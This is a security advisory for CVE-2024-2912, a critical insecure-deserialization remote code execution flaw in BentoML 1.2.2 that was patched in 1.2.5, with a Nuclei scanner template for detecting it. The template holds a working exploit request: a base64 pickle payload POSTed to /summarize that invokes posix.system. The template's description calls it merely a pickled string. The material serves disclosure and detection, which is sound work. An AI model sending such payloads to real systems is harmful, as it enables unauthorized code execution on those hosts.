Critical

bentoml

Remote Code Execution via Insecure Deserialization in BentoML

BentoML version 1.2.2 is vulnerable to remote code execution (RCE) through insecure deserialization, allowing attackers to execute arbitrary code by sending a malicious POST request. This vulnerability was patched in version 1.2.5.

Available publicly on Apr 16 2024

9.8

CVE:

CVE-2024-2912

CWE:

1188:Insecure Default Initialization of Resource

CVSS:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Credit:

pinkdraconian
AssessDetect

Available

Remediate
Nuclei Template
Nuclei Template
1id: bentoml-rce
2info:
3  name: BentoML Insecure Deserialization RCE Simulation
4  author: DanMcInerney, byt3bl33d3r, pinkdraconian
5  severity: critical
6  description: Simulates an insecure deserialization attack on BentoML to trigger remote code execution. Binary data is string "protectai" pickled.
7  reference:
8    - https://huntr.com/bounties/349a1cce-6bb5-4345-82a5-bf7041b65a68
9  classification:
10    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
11    cvss-score: 9.8
12    cwe-id: CWE-1188 # Insecure Default Initialization of Resource
13  tags: bentoml, rce, deserialization, protectai, huntr, ai, machine-learning
14requests:
15  - method: POST
16    path:
17      - "{{BaseURL}}/summarize"
18    headers:
19      Content-Type: "application/vnd.bentoml+pickle"
20    body: !!binary |
21      gASVJAAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjAlwcm90ZWN0YWmUhZRSlC4=
22    matchers-condition: and
23    matchers:
24      - type: word
25        words:
26          - "Input should be a valid dictionary or instance of Input"
27        part: body
Resources

Learn how to use the Nuclei scanners and other scripts, or download the scanners and use them yourself.

How to use Nuclei scanners

Learn more about scanners and how to use them

Want more out of Sightline?

Sightline offers even more for premium customers

Go Premium

We have - related security advisories that are available with Sightline Premium.